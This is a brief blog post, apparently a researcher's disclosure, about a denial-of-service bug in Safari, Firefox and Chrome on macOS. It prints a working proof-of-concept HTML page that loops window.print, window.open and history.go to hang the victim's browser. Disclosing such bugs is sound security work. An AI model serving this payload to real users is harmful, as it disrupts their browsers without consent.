Denial Of Service Bug Due to Calling window.print in a loop- Safari and Mozilla Web Browser


Calling window.print in a loop Causing DOS in Mozilla and Safari 



Hello All,

This post is about a bug that I reported in Mozilla , Safari and Google Chrome ( MacOS )
This occurs when the browser is not able to properly handle the input . An attacker can send this html to initiate a Denial Of Service attack on the victims browser .
POC :

<html>
<title>DoS</title>
<script>
function dos(){
window.onerror=new Function(history.go(window.open(window.print())));
}
 dos();
</script>
</html>

POC Video

Safari :

Status : Reported, Working on a Fix









Mozilla FireFox :

Status : Reported, Working on a Fix




Is your Browser Vulnerable ?
CLICK HERE


Thank You For Reading

Hemanth Joseph

.

No comments:

Post a Comment

Note: Only a member of this blog may post a comment.